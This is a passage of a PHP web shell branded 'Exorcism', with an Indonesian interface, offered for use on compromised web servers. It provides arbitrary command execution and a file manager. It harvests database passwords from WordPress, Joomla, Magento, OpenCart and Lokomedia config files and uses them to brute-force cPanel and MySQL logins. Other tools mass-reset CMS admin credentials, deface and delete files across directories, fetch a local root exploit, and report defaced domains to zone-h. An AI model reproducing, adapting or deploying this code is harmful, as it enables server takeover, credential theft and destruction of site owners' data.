1141 <th class="th_home"><center>Tipe</center></th>
1142 <th class="th_home"><center>Ukuran</center></th>
1143 <th class="th_home"><center>Terakhir Edit</center></th>
1144 <th class="th_home"><center>User/Group</center></th>
1145 <th class="th_home"><center>Hak Izin</center></th>
1146 <th class="th_home"><center>Aksi</center></th>
1147 </tr>';
1148
1149 if(function_exists('opendir')) {
1150 if($opendir = opendir(path())) {
1151 while(($readdir = readdir($opendir)) !== false) {
1152 $dir[] = $readdir;
1153 }
1154 closedir($opendir);
1155 }
1156 sort($dir);
1157 } else {
1158 $dir = scandir(path());
1159 }
1160
1161 foreach($dir as $folder) {
1162 $dirinfo['path'] = path().DIRECTORY_SEPARATOR.$folder;
1163 if(!is_dir($dirinfo['path'])) continue;
1164 $dirinfo['type'] = filetype($dirinfo['path']);
1165 $dirinfo['time'] = date("F d Y g:i:s", filemtime($dirinfo['path']));
1166 $dirinfo['size'] = "-";
1167 $dirinfo['perms'] = writeable($dirinfo['path'], perms($dirinfo['path']));
1168 $dirinfo['link'] = ($folder === ".." ? "<a href='?dir=".dirname(path())."'>$folder</a>" : ($folder === "." ? "<a href='?dir=".path()."'>$folder</a>" : "<a href='?dir=".$dirinfo['path']."'>$folder</a>"));
1169 $dirinfo['action']= ($folder === '.' || $folder === '..') ? "<a href='?act=newfile&dir=".path()."'>File Baru</a> | <a href='?act=newfolder&dir=".path()."'>Dir Baru</a>" : "<a href='?act=rename_folder&dir=".$dirinfo['path']."'>Ubah Nama</a> | <a href='?act=delete_folder&dir=".$dirinfo['path']."'>Hapus</a>";
1170 if(function_exists('posix_getpwuid')) {
1171 $dirinfo['owner'] = (object) @posix_getpwuid(fileowner($dirinfo['path']));
1172 $dirinfo['owner'] = $dirinfo['owner']->name;
1173 } else {
1174 $dirinfo['owner'] = fileowner($dirinfo['path']);
1175 }
1176 if(function_exists('posix_getgrgid')) {
1177 $dirinfo['group'] = (object) @posix_getgrgid(filegroup($dirinfo['path']));
1178 $dirinfo['group'] = $dirinfo['group']->name;
1179 } else {
1180 $dirinfo['group'] = filegroup($dirinfo['path']);
1181 }
1182 print "<tr>";
1183 print "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>".$dirinfo['link']."</td>";
1184 print "<td class='td_home' style='text-align: center;'>".$dirinfo['type']."</td>";
1185 print "<td class='td_home' style='text-align: center;'>".$dirinfo['size']."</td>";
1186 print "<td class='td_home' style='text-align: center;'>".$dirinfo['time']."</td>";
1187 print "<td class='td_home' style='text-align: center;'>".$dirinfo['owner'].DIRECTORY_SEPARATOR.$dirinfo['group']."</td>";
1188 print "<td class='td_home' style='text-align: center;'>".$dirinfo['perms']."</td>";
1189 print "<td class='td_home' style='padding-left: 15px;'>".$dirinfo['action']."</td>";
1190 print "</tr>";
1191 }
1192 foreach($dir as $files) {
1193 $fileinfo['path'] = path().DIRECTORY_SEPARATOR.$files;
1194 if(!is_file($fileinfo['path'])) continue;
1195 $fileinfo['type'] = filetype($fileinfo['path']);
1196 $fileinfo['time'] = date("F d Y g:i:s", filemtime($fileinfo['path']));
1197 $fileinfo['size'] = filesize($fileinfo['path'])/1024;
1198 $fileinfo['size'] = round($fileinfo['size'],3);
1199 $fileinfo['size'] = ($fileinfo['size'] > 1024) ? round($fileinfo['size']/1024,2). "MB" : $fileinfo['size']. "KB";
1200 $fileinfo['perms']= writeable($fileinfo['path'], perms($fileinfo['path']));
1201 if(function_exists('posix_getpwuid')) {
1202 $fileinfo['owner'] = (object) @posix_getpwuid(fileowner($fileinfo['path']));
1203 $fileinfo['owner'] = $fileinfo['owner']->name;
1204 } else {
1205 $fileinfo['owner'] = fileowner($fileinfo['path']);
1206 }
1207 if(function_exists('posix_getgrgid')) {
1208 $fileinfo['group'] = (object) @posix_getgrgid(filegroup($fileinfo['path']));
1209 $fileinfo['group'] = $fileinfo['group']->name;
1210 } else {
1211 $fileinfo['group'] = filegroup($fileinfo['path']);
1212 }
1213 print "<tr>";
1214 print "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=".path()."&file=".$fileinfo['path']."'>$files</a></td>";
1215 print "<td class='td_home' style='text-align: center;'>".$fileinfo['type']."</td>";
1216 print "<td class='td_home' style='text-align: center;'>".$fileinfo['size']."</td>";
1217 print "<td class='td_home' style='text-align: center;'>".$fileinfo['time']."</td>";
1218 print "<td class='td_home' style='text-align: center;'>".$fileinfo['owner'].DIRECTORY_SEPARATOR.$fileinfo['group']."</td>";
1219 print "<td class='td_home' style='text-align: center;'>".$fileinfo['perms']."</td>";
1220 print "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=".path()."&file=".$fileinfo['path']."'>Edit</a> | <a href='?act=rename&dir=".path()."&file=".$fileinfo['path']."'>Ubah Nama</a> | <a href='?act=delete&dir=".path()."&file=".$fileinfo['path']."'>Hapus</a> | <a href='?act=download&dir=".path()."&file=".$fileinfo['path']."'>Download</a></td>";
1221 print "</tr>";
1222 }
1223
1224 print "</table>";
1225 print "<center>Copyright © ".date("Y")." - ".color(1, 2, "./Exorcism")."</center>";
1226}
1227
1228
1229function action() {
1230 tools("upload");
1231 tools("cmd");
1232 print "<hr color=#00F0FF>";
1233 print "<center>";
1234 print "<ul>";
1235 print "<li> <a href='?'>Home</a> </li>";
1236 print "<li> <a href='?dir=".path()."&do=fakeroot'>Fake Root</a> </li>";
1237 print "<li> <a href='?dir=".path()."&do=cpanel'>cPanel Crack</a> </li>";
1238 print "<li> <a href='?dir=".path()."&do=mpc'>Mass Password Change</a> </li>";
1239 print "<li> <a href='?dir=".path()."&do=mass'>Mass Tools</a> </li>";
1240 print "<li> <a href='?dir=".path()."&do=lre'>Local Root Exploiter</a> </li>";
1241 print "<li> <a href='?dir=".path()."&do=zoneh'>Zone-H</a> </li>";
1242 print "</ul>";
1243 print "</center>";
1244 print "<hr color=#00F0FF>";
1245
1246
1247 if(isset($_GET['do'])) {
1248 if($_GET['do'] === "cmd") {
1249 if(isset($_POST['cmd'])) {
1250 if(preg_match("/^rf (.*)$/", $_POST['cmd'], $match)) {
1251 tools("readfile", $match[1]);
1252 }
1253 elseif(preg_match("/^spawn (.*)$/", $_POST['cmd'], $match)) {
1254 tools("spawn", $match[1]);
1255 }
1256 elseif(preg_match("/^symlink$/", $_POST['cmd'], $match)) {
1257 tools("symlink");
1258 }
1259 elseif(preg_match("/^rvr (.*)$/", $_POST['cmd'], $match)) {
1260 tools("network", $match[1]);
1261 }
1262 elseif(preg_match("/^krdp$/", $_POST['cmd'])) {
1263 tools("krdp");
1264 }
1265 elseif(preg_match("/^jumping$/", $_POST['cmd'])) {
1266 tools("jumping");
1267 }
1268 elseif(preg_match("/^idxconfig$/", $_POST['cmd'])) {
1269 tools("idxconfig");
1270 }
1271 elseif(preg_match("/^logout$/", $_POST['cmd'])) {
1272 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1273 print "<script>window.location='?';</script>";
1274 }
1275 elseif(preg_match("/^killme$/", $_POST['cmd'])) {
1276 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1277 @unlink(__FILE__);
1278 print "<script>window.location='?';</script>";
1279 }
1280 else {
1281 print "<pre>".exe($_POST['cmd'])."</pre>";
1282 }
1283 }
1284 else {
1285 files_and_folder();
1286 }
1287 }
1288 elseif($_GET['do'] === "zoneh") {
1289 if(isset($_POST['submit']) AND $_GET['do'] === "zoneh") {
1290 $nick = $_POST['nick'];
1291 $domain = explode("\r\n", $_POST['url']);
1292
1293 print "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1294 print "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1295
1296 foreach($domain as $no => $url) {
1297 $no = ($no+1).".";
1298 $post = curl("http://www.zone-h.org/notify/single", TRUE, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1299 if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $post)) {
1300 print "$no $url -> ".color(1, 2, "OK")."<br>";
1301 } else {
1302 print "$no $url -> ".color(1, 1, "ERROR")."<br>";
1303 }
1304 }
1305 }
1306 else {
1307 print "<center><form method='post' action='?do=zoneh&dir=".path()."'>
1308 Defacer: <br>
1309 <input type='text' name='nick' size='50' value='Exorcism'><br><br>
1310 Domains: <br>
1311 <textarea style='width: 450px; height: 150px;' name='url' placeholder='http://google.com/'></textarea><br>
1312 <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;' type='submit' name='submit' value='Submit'>
1313 </form></center>";
1314 }
1315 }
1316 elseif($_GET['do'] == 'cpanel') {
1317 if($_POST['crack']) {
1318 $usercp = explode("\r\n", $_POST['user_cp']);
1319 $passcp = explode("\r\n", $_POST['pass_cp']);
1320 $i = 0;
1321 foreach($usercp as $ucp) {
1322 foreach($passcp as $pcp) {
1323 $connect = mysql_connect('localhost', $ucp, $pcp);
1324 if($connect) {
1325 if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1326 } else {
1327 $_SESSION[$ucp] = "1";
1328 $_SESSION[$pcp] = "1";
1329 if($ucp === '' || $pcp === '') {
1330 //
1331 } else {
1332 $i++;
1333 print "username (".color(1, 2, $ucp).") password (".color(1, 2, $pcp).") domain (";
1334 if(!function_exists('posix_getpwuid')) print color(1, 1, "Function is Disable by System!");
1335 if(!getdomainname()) print color(1, 1, "Can't get domain name");
1336 foreach(getdomainname() as $domain) {
1337 $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
1338 $userdomain = $userdomain->name;
1339 if($userdomain === $user) {
1340 print "<a href='http://$domain/' target='_blank'>".color(1, 2, $domain)."</a><br>";
1341 break;
1342 }
1343 }
1344 print (empty($domain)) ? color(1, 1, "Can't get domain name.") : color(1, 2, $domain);
1345 print ")<br>";
1346 }
1347 }
1348 mysql_close($connect);
1349 }
1350 }
1351 }
1352 print ($i === 0) ? "" : "<p>".color(1, 3, "Sukses nyolong $i Cpanel by Exorcism")."</p>";
1353 } else {
1354 print "<center>
1355 <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1356 <form method='post'>
1357 USER: <br>
1358 <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1359 print implode("\n", getuser());
1360 print "</textarea><br>
1361 PASS: <br>
1362 <span>Grab Password from Link Config:</span><br>
1363 <input style='width: 425px; background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='text' name='linkpass' placeholder='http://web.com/idx_config/'>
1364 <input style='background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='submit' name='submitlink' value='>>'>
1365 <br>
1366 <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1367
1368 if(isset($_POST['submitlink'])) {
1369 $getpass = $_POST['linkpass'];
1370 $get = curl($_POST['linkpass']);
1371 preg_match_all('/<a href="(.*?).txt">/', $get, $link);
1372 foreach($link[1] as $link_config) {
1373 $scandir[] = "$link_config.txt";
1374 }
1375 }
1376 else {
1377 $getpass = path();
1378 $scandir = scandir($getpass);
1379 }
1380
1381 $password = "";
1382
1383 foreach($scandir as $files) {
1384 $file = "$getpass/$files";
1385 $config = file_get_contents($file);
1386 if(preg_match("/WordPress/", $config)) {
1387 $password .= getValue($config, "DB_PASSWORD', '", "'")."\n";
1388 }
1389 elseif(preg_match("/JConfig|joomla/", $config)) {
1390 $password .= getValue($config, "password = '", "'")."\n";
1391 }
1392 elseif(preg_match("/Magento|Mage_Core/", $config)) {
1393 $password .= getValue($config, "<password><![CDATA[", "]]></password>")."\n";
1394 }
1395 elseif(preg_match("/panggil fungsi validasi xss dan injection/", $config)) {
1396 $password .= getValue($config, 'password = "', '"')."\n";
1397 }
1398 elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config)) {
1399 $password .= getValue($config, "'DB_PASSWORD', '", "'")."\n";
1400 }
1401 elseif(preg_match("/^[client]$/", $config)) {
1402 preg_match("/password=(.*?)/", $config, $pass);
1403 if(preg_match('/"/', $pass[1])) {
1404 $pass[1] = str_replace('"', "", $pass[1]);
1405 $password .= $pass[1]."\n";
1406 }
1407 else {
1408 $password .= $pass[1]."\n";
1409 }
1410 }
1411 elseif(preg_match("/cc_encryption_hash/", $config)) {
1412 $password .= getValue($config, "db_password = '", "'")."\n";
1413 }
1414 }
1415
1416 print $password;
1417
1418 print "</textarea><br>
1419 <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;' type='submit' name='crack' value='Crack'>
1420 </form></center>";
1421 }
1422 }
1423 elseif($_GET['do'] == 'mpc') {
1424 if($_POST['hajar']) {
1425 if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1426 print "username atau password harus lebih dari 6 karakter";
1427 }
1428 else {
1429 $user_baru = $_POST['user_baru'];
1430 $pass_baru = md5($_POST['pass_baru']);
1431 $conf = $_POST['config_dir'];
1432
1433 if(preg_match("/^http:\/\//", $conf) OR preg_match("/^https:\/\//", $conf)) {
1434 $get = curl($conf);
1435 preg_match_all('/<a href="(.*?).txt">/', $get, $link);
1436 foreach($link[1] as $link_config) {
1437 $scan_conf[] = "$link_config.txt";
1438 }
1439 }
1440 else {
1441 $scan_conf = scandir($conf);
1442 }
1443
1444 foreach($scan_conf as $file_conf) {
1445 $config = file_get_contents("$conf/$file_conf");
1446 if(preg_match("/JConfig|joomla/",$config)) {
1447 $dbhost = getValue($config,"host = '","'");
1448 $dbuser = getValue($config,"user = '","'");
1449 $dbpass = getValue($config,"password = '","'");
1450 $dbname = getValue($config,"db = '","'");
1451 $dbprefix = getValue($config,"dbprefix = '","'");
1452 $prefix = $dbprefix."users";
1453 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1454 $db = mysql_select_db($dbname);
1455 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1456 $result = mysql_fetch_array($q);
1457 $id = $result['id'];
1458 $site = getValue($config,"sitename = '","'");
1459 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1460 print "Config => ".$file_conf."<br>";
1461 print "CMS => Joomla<br>";
1462 if($site == '') {
1463 print "Sitename => ".color(1, 1, "Can't get domain name")."<br>";
1464 }
1465 else {
1466 print "Sitename => $site<br>";
1467 }
1468 if(!$update OR !$conn OR !$db) {
1469 print "Status => ".color(1, 1, mysql_error())."<br><br>";
1470 }
1471 else {
1472 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
1473 }
1474 mysql_close($conn);
1475 } elseif(preg_match("/WordPress/",$config)) {
1476 $dbhost = getValue($config,"DB_HOST', '","'");
1477 $dbuser = getValue($config,"DB_USER', '","'");
1478 $dbpass = getValue($config,"DB_PASSWORD', '","'");
1479 $dbname = getValue($config,"DB_NAME', '","'");
1480 $dbprefix = getValue($config,"table_prefix = '","'");
1481 $prefix = $dbprefix."users";
1482 $option = $dbprefix."options";
1483 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1484 $db = mysql_select_db($dbname);
1485 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1486 $result = mysql_fetch_array($q);
1487 $id = $result[ID];
1488 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1489 $result2 = mysql_fetch_array($q2);
1490 $target = $result2[option_value];
1491 if($target == '') {
1492 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
1493 }
1494 else {
1495 $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1496 }
1497 $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1498 print "Config => ".$file_conf."<br>";
1499 print "CMS => Wordpress<br>";
1500 print $url_target;
1501 if(!$update OR !$conn OR !$db) {
1502 print "Status => ".color(1, 1, mysql_error())."<br><br>";
1503 }
1504 else {
1505 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
1506 }
1507 mysql_close($conn);
1508 }
1509 elseif(preg_match("/Magento|Mage_Core/",$config)) {
1510 $dbhost = getValue($config,"<host><![CDATA[","]]></host>");
1511 $dbuser = getValue($config,"<username><![CDATA[","]]></username>");
1512 $dbpass = getValue($config,"<password><![CDATA[","]]></password>");
1513 $dbname = getValue($config,"<dbname><![CDATA[","]]></dbname>");
1514 $dbprefix = getValue($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1515 $prefix = $dbprefix."admin_user";
1516 $option = $dbprefix."core_config_data";
1517 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1518 $db = mysql_select_db($dbname);
1519 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1520 $result = mysql_fetch_array($q);
1521 $id = $result[user_id];
1522 $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1523 $result2 = mysql_fetch_array($q2);
1524 $target = $result2[value];
1525 if($target == '') {
1526 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
1527 }
1528 else {
1529 $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1530 }
1531 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1532 print "Config => ".$file_conf."<br>";
1533 print "CMS => Magento<br>";
1534 print $url_target;
1535 if(!$update OR !$conn OR !$db) {
1536 print "Status => ".color(1, 1, mysql_error())."<br><br>";
1537 }
1538 else {
1539 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
1540 }
1541 mysql_close($conn);
1542 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1543 $dbhost = getValue($config,"'DB_HOSTNAME', '","'");
1544 $dbuser = getValue($config,"'DB_USERNAME', '","'");
1545 $dbpass = getValue($config,"'DB_PASSWORD', '","'");
1546 $dbname = getValue($config,"'DB_DATABASE', '","'");
1547 $dbprefix = getValue($config,"'DB_PREFIX', '","'");
1548 $prefix = $dbprefix."user";
1549 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1550 $db = mysql_select_db($dbname);
1551 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1552 $result = mysql_fetch_array($q);
1553 $id = $result[user_id];
1554 $target = getValue($config,"HTTP_SERVER', '","'");
1555 if($target == '') {
1556 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
1557 }
1558 else {
1559 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1560 }
1561 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1562 print "Config => ".$file_conf."<br>";
1563 print "CMS => OpenCart<br>";
1564 print $url_target;
1565 if(!$update OR !$conn OR !$db) {
1566 print "Status => ".color(1, 1, mysql_error())."<br><br>";
1567 }
1568 else {
1569 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
1570 }
1571 mysql_close($conn);
1572 }
1573 elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1574 $dbhost = getValue($config,'server = "','"');
1575 $dbuser = getValue($config,'username = "','"');
1576 $dbpass = getValue($config,'password = "','"');
1577 $dbname = getValue($config,'database = "','"');
1578 $prefix = "users";
1579 $option = "identitas";
1580 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1581 $db = mysql_select_db($dbname);
1582 $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1583 $result = mysql_fetch_array($q);
1584 $target = $result[alamat_website];
1585 if($target == '') {
1586 $target2 = $result[url];
1587 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
1588 if($target2 == '') {
1589 $url_target2 = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
1590 }
1591 else {
1592 $cek_login3 = file_get_contents("$target2/adminweb/");
1593 $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1594 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1595 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1596 }
1597 elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1598 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1599 }
1600 else {
1601 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1602 }
1603 }
1604 } else {
1605 $cek_login = file_get_contents("$target/adminweb/");
1606 $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1607 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1608 $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1609 }
1610 elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1611 $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1612 }
1613 else {
1614 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1615 }
1616 }
1617 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1618 print "Config => ".$file_conf."<br>";
1619 print "CMS => Lokomedia<br>";
1620 if(preg_match("/Can't get domain name/", $url_target)) {
1621 print $url_target2;
1622 }
1623 else {
1624 print $url_target;
1625 }
1626 if(!$update OR !$conn OR !$db) {
1627 print "Status => ".color(1, 1, mysql_error())."<br><br>";
1628 }
1629 else {
1630 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
1631 }
1632 mysql_close($conn);
1633 }
1634 }
1635 }
1636 }
1637 else {
1638 print "<center>
1639 <h1>Mass Password Change</h1>
1640 <form method='post'>
1641 <input type='radio' name='config_type' value='dir' checked>DIR Config<input type='radio' name='config_type' value='link'>LINK Config<br>
1642 <input type='text' size='50' name='config_dir' value='".path()."'><br><br>
1643 Set User & Pass: <br>
1644 <input type='text' name='user_baru' value='Exorcism' placeholder='user_baru'><br>
1645 <input type='text' name='pass_baru' value='Exorcism' placeholder='pass_baru'><br>
1646 <input style='background: transparent; color: #ffffff; border: 1px solid #00F0FF; width: 215px; margin: 5px auto;' type='submit' name='hajar' value='Hajar!'>
1647 </form></center>";
1648 }
1649 }
1650 elseif($_GET['do'] === "mass") {
1651 if($_POST['start']) {
1652 if($_POST['mass_type'] === 'singledir') {
1653 print "<div style='margin: 5px auto; padding: 5px'>";
1654 massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file']);
1655 print "</div>";
1656 }
1657 elseif($_POST['mass_type'] === 'alldir') {
1658 print "<div style='margin: 5px auto; padding: 5px'>";
1659 massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file'], "-alldir");
1660 print "</div>";
1661 }
1662 elseif($_POST['mass_type'] === "delete") {
1663 print "<div style='margin: 5px auto; padding: 5px'>";
1664 massdelete($_POST['d_dir'], $_POST['d_file']);
1665 print "</div>";
1666 }
1667 }
1668 else {
1669 print "<center><form method='post'>
1670 <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
1671 <input type='radio' name='mass_type' value='singledir' checked>Mass Deface Single Directory<input type='radio' name='mass_type' value='alldir'>Mass Deface All Directory<input type='radio' name='mass_type' value='delete'>Mass Delete File<br>
1672 <span>( kosongkan 'Index File' jika memilih Mass Delete File )</span><br><br>
1673 <font style='text-decoration: underline;'>Folder:</font><br>
1674 <input type='text' name='d_dir' value='".path()."' style='width: 450px;' height='10'><br><br>
1675 <font style='text-decoration: underline;'>Filename:</font><br>
1676 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br><br>
1677 <font style='text-decoration: underline;'>Index File:</font><br>
1678 <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Exorcism</textarea><br>
1679 <input style='background: transparent; color: #ffffff; border: 1px solid #00F0FF; width: 460px; margin: 5px auto;' type='submit' name='start' value='Mass'>
1680 </form></center>";
1681 }
1682 }
1683 elseif($_GET['do'] == 'fakeroot') {
1684 ob_start();
1685
1686 $site = explode("\r\n", $_POST['url']);
1687 $user = usergroup()->name;
1688 $file = $_POST['file'];
1689
1690 if(!preg_match("#/home/$user/public_html#", $_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "I think this server not using shared host :("));
1691
1692
1693 if($_POST['reverse']) {
1694 if(!is_writable($_SERVER['DOCUMENT_ROOT'])) die(color(1, 1, "Directory '".$_SERVER['DOCUMENT_ROOT']."' is not writeable."));
1695 if(!is_writable(dirname($_SERVER['DOCUMENT_ROOT']))) die(color(1, 1, "Directory '".dirname($_SERVER['DOCUMENT_ROOT'])."' is not writeable."));
1696
1697 save($_SERVER['DOCUMENT_ROOT']."/".$file, "w", $_POST['script']);
1698 save(dirname($_SERVER['DOCUMENT_ROOT'])."/".$file, "w", $_POST['script']);
1699
1700 foreach($site as $url) {
1701 $cek = curl("$url/~$user/$file");
1702 if(preg_match("/hacked/i", $cek)) {
1703 print "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
1704 }
1705 }
1706 } else {
1707 print "<center><form method='post'>
1708 Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1709 User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1710 Domain: <br>
1711 <textarea style='width: 450px; height: 250px;' name='url'>";
1712 print implode("\n", reverse());
1713 print "</textarea><br>
1714 <font style='text-decoration: underline;'>Index File:</font><br>
1715 <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Exorcism</textarea><br>
1716 <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px; margin: 5px auto;' type='submit' name='reverse' value='Scan Fake Root!'>
1717 </form><br>
1718 NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
1719 }
1720 }
1721 elseif($_GET['do'] === 'lre') {
1722 if(file_exists("makman.php")) {
1723 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/makman.php' frameborder='0' scrolling='yes'></iframe>";
1724 }
1725 else {
1726 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Makman'."));
1727 if(getfile("LRE")) {
1728 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/makman.php' frameborder='0' scrolling='yes'></iframe>";
1729 }
1730 else {
1731 print color(1, 1, "Error while downloading file makman.");
1732 @unlink("makman.php");
1733 }
1734 }
1735
1736 }
1737 }
1738 elseif(isset($_GET['act'])) {
1739 if($_GET['act'] === 'newfile') {
1740 if($_POST['save']) {
1741 $filename = htmlspecialchars($_POST['filename']);
1742 $fopen = fopen($filename, "a+");
1743 if($fopen) {
1744 $act = "<script>window.location='?act=edit&dir=".path()."&file=".$_POST['filename']."';</script>";
1745 }
1746 else {
1747 $act = color(1, 1, "Permission Denied!");
1748 }
1749 }
1750 print $act;
1751 print "<form method='post'>
1752 Nama File: <input type='text' name='filename' value='".path()."/newfile.php' style='width: 450px;' height='10'>
1753 <input type='submit' class='input' name='save' value='Buat File!'>
1754 </form>";
1755 }
